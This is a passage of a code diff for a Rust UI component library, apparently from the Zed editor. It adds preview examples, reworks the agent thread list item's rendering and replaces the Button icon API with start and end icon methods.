label: SharedString,
button_label: Option<SharedString>,
@@ -52,6 +52,59 @@ impl ConfiguredApiCard {
}
}
+impl Component for ConfiguredApiCard {
+ fn scope() -> ComponentScope {
+ ComponentScope::Agent
+ }
+
+ fn preview(_window: &mut Window, cx: &mut App) -> Option<AnyElement> {
+ let container = || {
+ v_flex()
+ .w_72()
+ .p_2()
+ .gap_2()
+ .border_1()
+ .border_color(cx.theme().colors().border_variant)
+ .bg(cx.theme().colors().panel_background)
+ };
+
+ let examples = vec![
+ single_example(
+ "Default",
+ container()
+ .child(ConfiguredApiCard::new("API key is configured"))
+ .into_any_element(),
+ ),
+ single_example(
+ "Custom Button Label",
+ container()
+ .child(
+ ConfiguredApiCard::new("OpenAI API key configured")
+ .button_label("Remove Key"),
+ )
+ .into_any_element(),
+ ),
+ single_example(
+ "With Tooltip",
+ container()
+ .child(
+ ConfiguredApiCard::new("Anthropic API key configured")
+ .tooltip_label("Click to reset your API key"),
+ )
+ .into_any_element(),
+ ),
+ single_example(
+ "Disabled",
+ container()
+ .child(ConfiguredApiCard::new("API key is configured").disabled(true))
+ .into_any_element(),
+ ),
+ ];
+
+ Some(example_group(examples).into_any_element())
+ }
+}
+
impl RenderOnce for ConfiguredApiCard {
fn render(self, _: &mut Window, cx: &mut App) -> impl IntoElement {
let button_label = self.button_label.unwrap_or("Reset Key".into());
@@ -80,10 +133,11 @@ impl RenderOnce for ConfiguredApiCard {
elem.tab_index(tab_index)
})
.label_size(LabelSize::Small)
- .icon(IconName::Undo)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Undo)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.disabled(self.disabled)
.when_some(self.tooltip_label, |this, label| {
this.tooltip(Tooltip::text(label))
@@ -1 +0,0 @@
-
@@ -1,9 +1,13 @@
use crate::{
- DecoratedIcon, DiffStat, GradientFade, HighlightedLabel, IconDecoration, IconDecorationKind,
- SpinnerLabel, prelude::*,
+ CommonAnimationExt, DecoratedIcon, DiffStat, GradientFade, HighlightedLabel, IconDecoration,
+ IconDecorationKind, Tooltip, prelude::*,
};
-use gpui::{AnyView, ClickEvent, Hsla, SharedString};
+use gpui::{
+ Animation, AnimationExt, AnyView, ClickEvent, Hsla, MouseButton, SharedString,
+ pulsating_between,
+};
+use std::time::Duration;
#[derive(Clone, Copy, Debug, Default, PartialEq, Eq)]
pub enum AgentThreadStatus {
@@ -18,8 +22,13 @@ pub enum AgentThreadStatus {
pub struct ThreadItem {
id: ElementId,
icon: IconName,
+ icon_color: Option<Color>,
+ icon_visible: bool,
custom_icon_from_external_svg: Option<SharedString>,
title: SharedString,
+ title_label_color: Option<Color>,
+ title_generating: bool,
+ highlight_positions: Vec<usize>,
timestamp: SharedString,
notified: bool,
status: AgentThreadStatus,
@@ -29,7 +38,7 @@ pub struct ThreadItem {
added: Option<usize>,
removed: Option<usize>,
worktree: Option<SharedString>,
- highlight_positions: Vec<usize>,
+ worktree_full_path: Option<SharedString>,
worktree_highlight_positions: Vec<usize>,
on_click: Option<Box<dyn Fn(&ClickEvent, &mut Window, &mut App) + 'static>>,
on_hover: Box<dyn Fn(&bool, &mut Window, &mut App) + 'static>,
@@ -42,8 +51,13 @@ impl ThreadItem {
Self {
id: id.into(),
icon: IconName::ZedAgent,
+ icon_color: None,
+ icon_visible: true,
custom_icon_from_external_svg: None,
title: title.into(),
+ title_label_color: None,
+ title_generating: false,
+ highlight_positions: Vec::new(),
timestamp: "".into(),
notified: false,
status: AgentThreadStatus::default(),
@@ -53,7 +67,7 @@ impl ThreadItem {
added: None,
removed: None,
worktree: None,
- highlight_positions: Vec::new(),
+ worktree_full_path: None,
worktree_highlight_positions: Vec::new(),
on_click: None,
on_hover: Box::new(|_, _, _| {}),
@@ -72,6 +86,16 @@ impl ThreadItem {
self
}
+ pub fn icon_color(mut self, color: Color) -> Self {
+ self.icon_color = Some(color);
+ self
+ }
+
+ pub fn icon_visible(mut self, visible: bool) -> Self {
+ self.icon_visible = visible;
+ self
+ }
+
pub fn custom_icon_from_external_svg(mut self, svg: impl Into<SharedString>) -> Self {
self.custom_icon_from_external_svg = Some(svg.into());
self
@@ -87,6 +111,21 @@ impl ThreadItem {
self
}
+ pub fn title_generating(mut self, generating: bool) -> Self {
+ self.title_generating = generating;
+ self
+ }
+
+ pub fn title_label_color(mut self, color: Color) -> Self {
+ self.title_label_color = Some(color);
+ self
+ }
+
+ pub fn highlight_positions(mut self, positions: Vec<usize>) -> Self {
+ self.highlight_positions = positions;
+ self
+ }
+
pub fn selected(mut self, selected: bool) -> Self {
self.selected = selected;
self
@@ -112,8 +151,8 @@ impl ThreadItem {
self
}
- pub fn highlight_positions(mut self, positions: Vec<usize>) -> Self {
- self.highlight_positions = positions;
+ pub fn worktree_full_path(mut self, worktree_full_path: impl Into<SharedString>) -> Self {
+ self.worktree_full_path = Some(worktree_full_path.into());
self
}
@@ -154,26 +193,54 @@ impl ThreadItem {
impl RenderOnce for ThreadItem {
fn render(self, _: &mut Window, cx: &mut App) -> impl IntoElement {
let color = cx.theme().colors();
- // let dot_separator = || {
- // Label::new("•")
- // .size(LabelSize::Small)
- // .color(Color::Muted)
- // .alpha(0.5)
- // };
-
- let icon_container = || h_flex().size_4().flex_none().justify_center();
+ let base_bg = color
+ .title_bar_background
+ .blend(color.panel_background.opacity(0.2));
+
+ let base_bg = if self.selected {
+ color.element_active
+ } else {
+ base_bg
+ };
+
+ let hover_color = color
+ .element_active
+ .blend(color.element_background.opacity(0.2));
+
+ let gradient_overlay = GradientFade::new(base_bg, hover_color, hover_color)
+ .width(px(64.0))
+ .right(px(-10.0))
+ .gradient_stop(0.75)
+ .group_name("thread-item");
+
+ let dot_separator = || {
+ Label::new("•")
+ .size(LabelSize::Small)
+ .color(Color::Muted)
+ .alpha(0.5)
+ };
+
+ let icon_id = format!("icon-{}", self.id);
+ let icon_visible = self.icon_visible;
+ let icon_container = || {
+ h_flex()
+ .id(icon_id.clone())
+ .size_4()
+ .flex_none()
+ .justify_center()
+ .when(!icon_visible, |this| this.invisible())
+ };
+ let icon_color = self.icon_color.unwrap_or(Color::Muted);
let agent_icon = if let Some(custom_svg) = self.custom_icon_from_external_svg {
Icon::from_external_svg(custom_svg)
- .color(Color::Muted)
+ .color(icon_color)
.size(IconSize::Small)
} else {
- Icon::new(self.icon)
- .color(Color::Muted)
- .size(IconSize::Small)
+ Icon::new(self.icon).color(icon_color).size(IconSize::Small)
};
let decoration = |icon: IconDecorationKind, color: Hsla| {
- IconDecoration::new(icon, cx.theme().colors().surface_background, cx)
+ IconDecoration::new(icon, base_bg, cx)
.color(color)
.position(gpui::Point {
x: px(-2.),
@@ -181,71 +248,95 @@ impl RenderOnce for ThreadItem {
})
};
- let decoration = if self.status == AgentThreadStatus::WaitingForConfirmation {
- Some(decoration(
- IconDecorationKind::Triangle,
- cx.theme().status().warning,
- ))
- } else if self.status == AgentThreadStatus::Error {
- Some(decoration(IconDecorationKind::X, cx.theme().status().error))
+ let (decoration, icon_tooltip) = if self.status == AgentThreadStatus::Error {
+ (
+ Some(decoration(IconDecorationKind::X, cx.theme().status().error)),
+ Some("Thread has an Error"),
+ )
+ } else if self.status == AgentThreadStatus::WaitingForConfirmation {
+ (
+ Some(decoration(
+ IconDecorationKind::Triangle,
+ cx.theme().status().warning,
+ )),
+ Some("Thread is Waiting for Confirmation"),
+ )
} else if self.notified {
- Some(decoration(IconDecorationKind::Dot, color.text_accent))
+ (
+ Some(decoration(IconDecorationKind::Dot, color.text_accent)),
+ Some("Thread's Generation is Complete"),
+ )
} else {
- None
+ (None, None)
};
- let icon = if let Some(decoration) = decoration {
- icon_container().child(DecoratedIcon::new(agent_icon, Some(decoration)))
+ let icon = if self.status == AgentThreadStatus::Running {
+ icon_container()
+ .child(
+ Icon::new(IconName::LoadCircle)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ .with_rotate_animation(2),
+ )
+ .into_any_element()
+ } else if let Some(decoration) = decoration {
+ icon_container()
+ .child(DecoratedIcon::new(agent_icon, Some(decoration)))
+ .when_some(icon_tooltip, |icon, tooltip| {
+ icon.tooltip(Tooltip::text(tooltip))
+ })
+ .into_any_element()
} else {
- icon_container().child(agent_icon)
+ icon_container().child(agent_icon).into_any_element()
};
- let is_running = matches!(
- self.status,
- AgentThreadStatus::Running | AgentThreadStatus::WaitingForConfirmation
- );
- let running_or_action = is_running || (self.hovered && self.action_slot.is_some());
-
let title = self.title;
let highlight_positions = self.highlight_positions;
- let title_label = if highlight_positions.is_empty() {
- Label::new(title).into_any_element()
- } else {
- HighlightedLabel::new(title, highlight_positions).into_any_element()
- };
- let base_bg = if self.selected {
- color.element_active
+ let title_label = if self.title_generating {
+ Label::new(title)
+ .color(Color::Muted)
+ .with_animation(
+ "generating-title",
+ Animation::new(Duration::from_secs(2))
+ .repeat()
+ .with_easing(pulsating_between(0.4, 0.8)),
+ |label, delta| label.alpha(delta),
+ )
+ .into_any_element()
+ } else if highlight_positions.is_empty() {
+ Label::new(title)
+ .when_some(self.title_label_color, |label, color| label.color(color))
+ .into_any_element()
} else {
- color.panel_background
+ HighlightedLabel::new(title, highlight_positions)
+ .when_some(self.title_label_color, |label, color| label.color(color))
+ .into_any_element()
};
- let gradient_overlay =
- GradientFade::new(base_bg, color.element_hover, color.element_active)
- .width(px(32.0))
- .right(px(-10.0))
- .gradient_stop(0.8)
- .group_name("thread-item");
+ let has_diff_stats = self.added.is_some() || self.removed.is_some();
+ let diff_stat_id = self.id.clone();
+ let added_count = self.added.unwrap_or(0);
+ let removed_count = self.removed.unwrap_or(0);
+
+ let has_worktree = self.worktree.is_some();
+ let has_timestamp = !self.timestamp.is_empty();
+ let timestamp = self.timestamp;
v_flex()
.id(self.id.clone())
+ .cursor_pointer()
.group("thread-item")
.relative()
.overflow_hidden()
- .cursor_pointer()
.w_full()
- .map(|this| {
- if self.worktree.is_some() {
- this.p_2()
- } else {
- this.px_2().py_1()
- }
- })
+ .py_1()
+ .px_1p5()
.when(self.selected, |s| s.bg(color.element_active))
.border_1()
.border_color(gpui::transparent_black())
- .when(self.focused, |s| s.border_color(color.panel_focused_border))
- .hover(|s| s.bg(color.element_hover))
+ .when(self.focused, |s| s.border_color(color.border_focused))
+ .hover(|s| s.bg(hover_color))
.on_hover(self.on_hover)
.child(
h_flex()
@@ -264,68 +355,87 @@ impl RenderOnce for ThreadItem {
.when_some(self.tooltip, |this, tooltip| this.tooltip(tooltip)),
)
.child(gradient_overlay)
- .when(running_or_action, |this| {
- this.child(
- h_flex()
- .gap_1()
- .when(is_running, |this| {
- this.child(
- icon_container()
- .child(SpinnerLabel::new().color(Color::Accent)),
- )
- })
- .when(self.hovered, |this| {
- this.when_some(self.action_slot, |this, slot| this.child(slot))
- }),
- )
+ .when(self.hovered, |this| {
+ this.when_some(self.action_slot, |this, slot| {
+ let overlay = GradientFade::new(base_bg, hover_color, hover_color)
+ .width(px(64.0))
+ .right(px(6.))
+ .gradient_stop(0.75)
+ .group_name("thread-item");
+
+ this.child(
+ h_flex()
+ .relative()
+ .on_mouse_down(MouseButton::Left, |_, _, cx| {
+ cx.stop_propagation()
+ })
+ .child(overlay)
+ .child(slot),
+ )
+ })
}),
)
- .when_some(self.worktree, |this, worktree| {
- let worktree_highlight_positions = self.worktree_highlight_positions;
- let worktree_label = if worktree_highlight_positions.is_empty() {
- Label::new(worktree)
- .size(LabelSize::Small)
- .color(Color::Muted)
- .into_any_element()
- } else {
- HighlightedLabel::new(worktree, worktree_highlight_positions)
- .size(LabelSize::Small)
- .color(Color::Muted)
- .into_any_element()
- };
+ .when(has_worktree || has_diff_stats || has_timestamp, |this| {
+ let worktree_full_path = self.worktree_full_path.clone().unwrap_or_default();
+ let worktree_label = self.worktree.map(|worktree| {
+ let positions = self.worktree_highlight_positions;
+ if positions.is_empty() {
+ Label::new(worktree)
+ .size(LabelSize::Small)
+ .color(Color::Muted)
+ .into_any_element()
+ } else {
+ HighlightedLabel::new(worktree, positions)
+ .size(LabelSize::Small)
+ .color(Color::Muted)
+ .into_any_element()
+ }
+ });
this.child(
h_flex()
.min_w_0()
.gap_1p5()
.child(icon_container()) // Icon Spacing
- .child(worktree_label)
- // TODO: Uncomment the elements below when we're ready to expose this data
- // .child(dot_separator())
- // .child(
- // Label::new(self.timestamp)
- // .size(LabelSize::Small)
- // .color(Color::Muted),
- // )
- // .child(
- // Label::new("•")
- // .size(LabelSize::Small)
- // .color(Color::Muted)
- // .alpha(0.5),
- // )
- // .when(has_no_changes, |this| {
- // this.child(
- // Label::new("No Changes")
- // .size(LabelSize::Small)
- // .color(Color::Muted),
- // )
- // })
- .when(self.added.is_some() || self.removed.is_some(), |this| {
- this.child(DiffStat::new(
- self.id,
- self.added.unwrap_or(0),
- self.removed.unwrap_or(0),
- ))
+ .when_some(worktree_label, |this, label| {
+ this.child(
+ h_flex()
+ .id(format!("{}-worktree", self.id.clone()))
+ .gap_1()
+ .child(
+ Icon::new(IconName::GitWorktree)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
+ .child(label)
+ .tooltip(move |_, cx| {
+ Tooltip::with_meta(
+ "Thread Running in a Local Git Worktree",
+ None,
+ worktree_full_path.clone(),
+ cx,
+ )
+ }),
+ )
+ })
+ .when(has_worktree && (has_diff_stats || has_timestamp), |this| {
+ this.child(dot_separator())
+ })
+ .when(has_diff_stats, |this| {
+ this.child(
+ DiffStat::new(diff_stat_id, added_count, removed_count)
+ .tooltip("Unreviewed changes"),
+ )
+ })
+ .when(has_diff_stats && has_timestamp, |this| {
+ this.child(dot_separator())
+ })
+ .when(has_timestamp, |this| {
+ this.child(
+ Label::new(timestamp.clone())
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
}),
)
})
@@ -349,21 +459,31 @@ impl Component for ThreadItem {
let thread_item_examples = vec![
single_example(
- "Default",
+ "Default (minutes)",
container()
.child(
ThreadItem::new("ti-1", "Linking to the Agent Panel Depending on Settings")
.icon(IconName::AiOpenAi)
- .timestamp("1:33 AM"),
+ .timestamp("15m"),
)
.into_any_element(),
),
single_example(
- "Notified",
+ "Timestamp Only (hours)",
+ container()
+ .child(
+ ThreadItem::new("ti-1b", "Thread with just a timestamp")
+ .icon(IconName::AiClaude)
+ .timestamp("3h"),
+ )
+ .into_any_element(),
+ ),
+ single_example(
+ "Notified (weeks)",
container()
.child(
ThreadItem::new("ti-2", "Refine thread view scrolling behavior")
- .timestamp("12:12 AM")
+ .timestamp("1w")
.notified(true),
)
.into_any_element(),
@@ -373,7 +493,7 @@ impl Component for ThreadItem {
container()
.child(
ThreadItem::new("ti-2b", "Execute shell command in terminal")
- .timestamp("12:15 AM")
+ .timestamp("2h")
.status(AgentThreadStatus::WaitingForConfirmation),
)
.into_any_element(),
@@ -383,7 +503,7 @@ impl Component for ThreadItem {
container()
.child(
ThreadItem::new("ti-2c", "Failed to connect to language server")
- .timestamp("12:20 AM")
+ .timestamp("5h")
.status(AgentThreadStatus::Error),
)
.into_any_element(),
@@ -394,7 +514,7 @@ impl Component for ThreadItem {
.child(
ThreadItem::new("ti-3", "Add line numbers option to FileEditBlock")
.icon(IconName::AiClaude)
- .timestamp("7:30 PM")
+ .timestamp("23h")
.status(AgentThreadStatus::Running),
)
.into_any_element(),
@@ -405,30 +525,43 @@ impl Component for ThreadItem {
.child(
ThreadItem::new("ti-4", "Add line numbers option to FileEditBlock")
.icon(IconName::AiClaude)
- .timestamp("7:37 PM")
+ .timestamp("2w")
.worktree("link-agent-panel"),
)
.into_any_element(),
),
single_example(
- "With Changes",
+ "With Changes (months)",
container()
.child(
ThreadItem::new("ti-5", "Managing user and project settings interactions")
.icon(IconName::AiClaude)
- .timestamp("7:37 PM")
+ .timestamp("1mo")
.added(10)
.removed(3),
)
.into_any_element(),
),
+ single_example(
+ "Worktree + Changes + Timestamp",
+ container()
+ .child(
+ ThreadItem::new("ti-5b", "Full metadata example")
+ .icon(IconName::AiClaude)
+ .worktree("my-project")
+ .added(42)
+ .removed(17)
+ .timestamp("3w"),
+ )
+ .into_any_element(),
+ ),
single_example(
"Selected Item",
container()
.child(
ThreadItem::new("ti-6", "Refine textarea interaction behavior")
.icon(IconName::AiGemini)
- .timestamp("3:00 PM")
+ .timestamp("45m")
.selected(true),
)
.into_any_element(),
@@ -439,7 +572,7 @@ impl Component for ThreadItem {
.child(
ThreadItem::new("ti-7", "Implement keyboard navigation")
.icon(IconName::AiClaude)
- .timestamp("4:00 PM")
+ .timestamp("12h")
.focused(true),
)
.into_any_element(),
@@ -450,12 +583,51 @@ impl Component for ThreadItem {
.child(
ThreadItem::new("ti-8", "Active and keyboard-focused thread")
.icon(IconName::AiGemini)
- .timestamp("5:00 PM")
+ .timestamp("2mo")
.selected(true)
.focused(true),
)
.into_any_element(),
),
+ single_example(
+ "Hovered with Action Slot",
+ container()
+ .child(
+ ThreadItem::new("ti-9", "Hover to see action button")
+ .icon(IconName::AiClaude)
+ .timestamp("6h")
+ .hovered(true)
+ .action_slot(
+ IconButton::new("delete", IconName::Trash)
+ .icon_size(IconSize::Small)
+ .icon_color(Color::Muted),
+ ),
+ )
+ .into_any_element(),
+ ),
+ single_example(
+ "Search Highlight",
+ container()
+ .child(
+ ThreadItem::new("ti-10", "Implement keyboard navigation")
+ .icon(IconName::AiClaude)
+ .timestamp("4w")
+ .highlight_positions(vec![0, 1, 2, 3, 4, 5, 6, 7, 8, 9]),
+ )
+ .into_any_element(),
+ ),
+ single_example(
+ "Worktree Search Highlight",
+ container()
+ .child(
+ ThreadItem::new("ti-11", "Search in worktree name")
+ .icon(IconName::AiClaude)
+ .timestamp("3mo")
+ .worktree("my-project-name")
+ .worktree_highlight_positions(vec![3, 4, 5, 6, 7, 8, 9, 10, 11]),
+ )
+ .into_any_element(),
+ ),
];
Some(
@@ -8,16 +8,14 @@ use gpui::{AnyElement, IntoElement, ParentElement, Styled};
///
/// ```
/// use ui::prelude::*;
-/// use ui::{Banner, Button, IconName, IconPosition, IconSize, Label, Severity};
+/// use ui::{Banner, Button, Icon, IconName, IconSize, Label, Severity};
///
/// Banner::new()
/// .severity(Severity::Success)
/// .children([Label::new("This is a success message")])
/// .action_slot(
/// Button::new("learn-more", "Learn More")
-/// .icon(IconName::ArrowUpRight)
-/// .icon_size(IconSize::Small)
-/// .icon_position(IconPosition::End)
+/// .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small)),
/// );
/// ```
#[derive(IntoElement, RegisterComponent)]
@@ -151,9 +149,7 @@ impl Component for Banner {
.child(Label::new("This is an informational message"))
.action_slot(
Button::new("learn-more", "Learn More")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::End),
+ .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small)),
)
.into_any_element(),
),
@@ -1,5 +1,4 @@
mod button;
-mod button_icon;
mod button_like;
mod button_link;
mod copy_button;
@@ -2,15 +2,12 @@ use crate::component_prelude::*;
use gpui::{AnyElement, AnyView, DefiniteLength};
use ui_macros::RegisterComponent;
-use crate::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle, IconName, IconSize, Label};
+use crate::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle, Icon, Label};
use crate::{
- Color, DynamicSpacing, ElevationIndex, IconPosition, KeyBinding, KeybindingPosition, TintColor,
- prelude::*,
+ Color, DynamicSpacing, ElevationIndex, KeyBinding, KeybindingPosition, TintColor, prelude::*,
};
-use super::button_icon::ButtonIcon;
-
-/// An element that creates a button with a label and an optional icon.
+/// An element that creates a button with a label and optional icons.
///
/// Common buttons:
/// - Label, Icon + Label: [`Button`] (this component)
@@ -42,7 +39,7 @@ use super::button_icon::ButtonIcon;
/// use ui::prelude::*;
///
/// Button::new("button_id", "Click me!")
-/// .icon(IconName::Check)
+/// .start_icon(Icon::new(IconName::Check))
/// .toggle_state(true)
/// .on_click(|event, window, cx| {
/// // Handle click event
@@ -85,12 +82,8 @@ pub struct Button {
label_size: Option<LabelSize>,
selected_label: Option<SharedString>,
selected_label_color: Option<Color>,
- icon: Option<IconName>,
- icon_position: Option<IconPosition>,
- icon_size: Option<IconSize>,
- icon_color: Option<Color>,
- selected_icon: Option<IconName>,
- selected_icon_color: Option<Color>,
+ start_icon: Option<Icon>,
+ end_icon: Option<Icon>,
key_binding: Option<KeyBinding>,
key_binding_position: KeybindingPosition,
alpha: Option<f32>,
@@ -112,12 +105,8 @@ impl Button {
label_size: None,
selected_label: None,
selected_label_color: None,
- icon: None,
- icon_position: None,
- icon_size: None,
- icon_color: None,
- selected_icon: None,
- selected_icon_color: None,
+ start_icon: None,
+ end_icon: None,
key_binding: None,
key_binding_position: KeybindingPosition::default(),
alpha: None,
@@ -149,39 +138,19 @@ impl Button {
self
}
- /// Assigns an icon to the button.
- pub fn icon(mut self, icon: impl Into<Option<IconName>>) -> Self {
- self.icon = icon.into();
- self
- }
-
- /// Sets the position of the icon relative to the label.
- pub fn icon_position(mut self, icon_position: impl Into<Option<IconPosition>>) -> Self {
- self.icon_position = icon_position.into();
- self
- }
-
- /// Specifies the size of the button's icon.
- pub fn icon_size(mut self, icon_size: impl Into<Option<IconSize>>) -> Self {
- self.icon_size = icon_size.into();
- self
- }
-
- /// Sets the color of the button's icon.
- pub fn icon_color(mut self, icon_color: impl Into<Option<Color>>) -> Self {
- self.icon_color = icon_color.into();
- self
- }
-
- /// Chooses an icon to display when the button is in a selected state.
- pub fn selected_icon(mut self, icon: impl Into<Option<IconName>>) -> Self {
- self.selected_icon = icon.into();
+ /// Sets an icon to display at the start (left) of the button label.
+ ///
+ /// The icon's color will be overridden to `Color::Disabled` when the button is disabled.
+ pub fn start_icon(mut self, icon: impl Into<Option<Icon>>) -> Self {
+ self.start_icon = icon.into();
self
}
- /// Sets the icon color used when the button is in a selected state.
- pub fn selected_icon_color(mut self, color: impl Into<Option<Color>>) -> Self {
- self.selected_icon_color = color.into();
+ /// Sets an icon to display at the end (right) of the button label.
+ ///
+ /// The icon's color will be overridden to `Color::Disabled` when the button is disabled.
+ pub fn end_icon(mut self, icon: impl Into<Option<Icon>>) -> Self {
+ self.end_icon = icon.into();
self
}
@@ -219,22 +188,24 @@ impl Button {
impl Toggleable for Button {
/// Sets the selected state of the button.
///
- /// This method allows the selection state of the button to be specified.
- /// It modifies the button's appearance to reflect its selected state.
- ///
/// # Examples
///
+ /// Create a toggleable button that changes appearance when selected:
+ ///
/// ```
/// use ui::prelude::*;
+ /// use ui::TintColor;
///
- /// Button::new("button_id", "Click me!")
- /// .toggle_state(true)
+ /// let selected = true;
+ ///
+ /// Button::new("toggle_button", "Toggle Me")
+ /// .start_icon(Icon::new(IconName::Check))
+ /// .toggle_state(selected)
+ /// .selected_style(ButtonStyle::Tinted(TintColor::Accent))
/// .on_click(|event, window, cx| {
- /// // Handle click event
+ /// // Toggle the selected state
/// });
/// ```
- ///
- /// Use [`selected_style`](Button::selected_style) to change the style of the button when it is selected.
fn toggle_state(mut self, selected: bool) -> Self {
self.base = self.base.toggle_state(selected);
self
@@ -242,22 +213,20 @@ impl Toggleable for Button {
}
impl SelectableButton for Button {
- /// Sets the style for the button when selected.
+ /// Sets the style for the button in a selected state.
///
/// # Examples
///
+ /// Customize the selected appearance of a button:
+ ///
/// ```
/// use ui::prelude::*;
/// use ui::TintColor;
///
- /// Button::new("button_id", "Click me!")
+ /// Button::new("styled_button", "Styled Button")
/// .toggle_state(true)
- /// .selected_style(ButtonStyle::Tinted(TintColor::Accent))
- /// .on_click(|event, window, cx| {
- /// // Handle click event
- /// });
+ /// .selected_style(ButtonStyle::Tinted(TintColor::Accent));
/// ```
- /// This results in a button with a blue tinted background when selected.
fn selected_style(mut self, style: ButtonStyle) -> Self {
self.base = self.base.selected_style(style);
self
@@ -265,36 +234,27 @@ impl SelectableButton for Button {
}
impl Disableable for Button {
- /// Disables the button.
+ /// Disables the button, preventing interaction and changing its appearance.
///
- /// This method allows the button to be disabled. When a button is disabled,
- /// it doesn't react to user interactions and its appearance is updated to reflect this.
+ /// When disabled, the button's icon and label will use `Color::Disabled`.
///
/// # Examples
///
+ /// Create a disabled button:
+ ///
/// ```
/// use ui::prelude::*;
///
- /// Button::new("button_id", "Click me!")
- /// .disabled(true)
- /// .on_click(|event, window, cx| {
- /// // Handle click event
- /// });
+ /// Button::new("disabled_button", "Can't Click Me")
+ /// .disabled(true);
/// ```
- ///
- /// This results in a button that is disabled and does not respond to click events.
fn disabled(mut self, disabled: bool) -> Self {
self.base = self.base.disabled(disabled);
- self.key_binding = self
- .key_binding
- .take()
- .map(|binding| binding.disabled(disabled));
self
}
}
impl Clickable for Button {
- /// Sets the click event handler for the button.
fn on_click(
mut self,
handler: impl Fn(&gpui::ClickEvent, &mut Window, &mut App) + 'static,
@@ -310,44 +270,35 @@ impl Clickable for Button {
}
impl FixedWidth for Button {
- /// Sets a fixed width for the button.
- ///
- /// This function allows a button to have a fixed width instead of automatically growing or shrinking.
/// Sets a fixed width for the button.
///
/// # Examples
///
+ /// Create a button with a fixed width of 100 pixels:
+ ///
/// ```
/// use ui::prelude::*;
///
- /// Button::new("button_id", "Click me!")
- /// .width(px(100.))
- /// .on_click(|event, window, cx| {
- /// // Handle click event
- /// });
+ /// Button::new("fixed_width_button", "Fixed Width")
+ /// .width(px(100.0));
/// ```
- ///
- /// This sets the button's width to be exactly 100 pixels.
fn width(mut self, width: impl Into<DefiniteLength>) -> Self {
self.base = self.base.width(width);
self
}
- /// Sets the button to occupy the full width of its container.
+ /// Makes the button take up the full width of its container.
///
/// # Examples
///
+ /// Create a button that takes up the full width of its container:
+ ///
/// ```
/// use ui::prelude::*;
///
- /// Button::new("button_id", "Click me!")
- /// .full_width()
- /// .on_click(|event, window, cx| {
- /// // Handle click event
- /// });
+ /// Button::new("full_width_button", "Full Width")
+ /// .full_width();
/// ```
- ///
- /// This stretches the button to the full width of its container.
fn full_width(mut self) -> Self {
self.base = self.base.full_width();
self
@@ -355,43 +306,34 @@ impl FixedWidth for Button {
}
impl ButtonCommon for Button {
- /// Sets the button's id.
fn id(&self) -> &ElementId {
self.base.id()
}
- /// Sets the visual style of the button using a [`ButtonStyle`].
+ /// Sets the visual style of the button.
fn style(mut self, style: ButtonStyle) -> Self {
self.base = self.base.style(style);
self
}
- /// Sets the button's size using a [`ButtonSize`].
+ /// Sets the size of the button.
fn size(mut self, size: ButtonSize) -> Self {
self.base = self.base.size(size);
self
}
- /// Sets a tooltip for the button.
- ///
- /// This method allows a tooltip to be set for the button. The tooltip is a function that
- /// takes a mutable references to [`Window`] and [`App`], and returns an [`AnyView`]. The
- /// tooltip is displayed when the user hovers over the button.
+ /// Sets a tooltip that appears on hover.
///
/// # Examples
///
- /// ```
- /// use ui::prelude::*;
- /// use ui::Tooltip;
+ /// Add a tooltip to a button:
///
- /// Button::new("button_id", "Click me!")
- /// .tooltip(Tooltip::text("This is a tooltip"))
- /// .on_click(|event, window, cx| {
- /// // Handle click event
- /// });
/// ```
+ /// use ui::{Tooltip, prelude::*};
///
- /// This will create a button with a tooltip that displays "This is a tooltip" when hovered over.
+ /// Button::new("tooltip_button", "Hover Me")
+ /// .tooltip(Tooltip::text("This is a tooltip"));
+ /// ```
fn tooltip(mut self, tooltip: impl Fn(&mut Window, &mut App) -> AnyView + 'static) -> Self {
self.base = self.base.tooltip(tooltip);
self
@@ -436,16 +378,12 @@ impl RenderOnce for Button {
h_flex()
.when(self.truncate, |this| this.min_w_0().overflow_hidden())
.gap(DynamicSpacing::Base04.rems(cx))
- .when(self.icon_position == Some(IconPosition::Start), |this| {
- this.children(self.icon.map(|icon| {
- ButtonIcon::new(icon)
- .disabled(is_disabled)
- .toggle_state(is_selected)
- .selected_icon(self.selected_icon)
- .selected_icon_color(self.selected_icon_color)
- .size(self.icon_size)
- .color(self.icon_color)
- }))
+ .when_some(self.start_icon, |this, icon| {
+ this.child(if is_disabled {
+ icon.color(Color::Disabled)
+ } else {
+ icon
+ })
})
.child(
h_flex()
@@ -465,16 +403,12 @@ impl RenderOnce for Button {
)
.children(self.key_binding),
)
- .when(self.icon_position != Some(IconPosition::Start), |this| {
- this.children(self.icon.map(|icon| {
- ButtonIcon::new(icon)
- .disabled(is_disabled)
- .toggle_state(is_selected)
- .selected_icon(self.selected_icon)
- .selected_icon_color(self.selected_icon_color)
- .size(self.icon_size)
- .color(self.icon_color)
- }))
+ .when_some(self.end_icon, |this, icon| {
+ this.child(if is_disabled {
+ icon.color(Color::Disabled)
+ } else {
+ icon
+ })
}),
)
}
@@ -585,24 +519,28 @@ impl Component for Button {
"Buttons with Icons",
vec![
single_example(
- "Icon Start",
- Button::new("icon_start", "Icon Start")
- .icon(IconName::Check)
- .icon_position(IconPosition::Start)
+ "Start Icon",
+ Button::new("icon_start", "Start Icon")
+ .start_icon(Icon::new(IconName::Check))
+ .into_any_element(),
+ ),
+ single_example(
+ "End Icon",
+ Button::new("icon_end", "End Icon")
+ .end_icon(Icon::new(IconName::Check))
.into_any_element(),
),
single_example(
- "Icon End",
- Button::new("icon_end", "Icon End")
- .icon(IconName::Check)
- .icon_position(IconPosition::End)
+ "Both Icons",
+ Button::new("both_icons", "Both Icons")
+ .start_icon(Icon::new(IconName::Check))
+ .end_icon(Icon::new(IconName::ChevronDown))
.into_any_element(),
),
single_example(
"Icon Color",
Button::new("icon_color", "Icon Color")
- .icon(IconName::Check)
- .icon_color(Color::Accent)
+ .start_icon(Icon::new(IconName::Check).color(Color::Accent))
.into_any_element(),
),
],
@@ -1,199 +0,0 @@
-use crate::{Icon, IconName, IconSize, IconWithIndicator, Indicator, prelude::*};
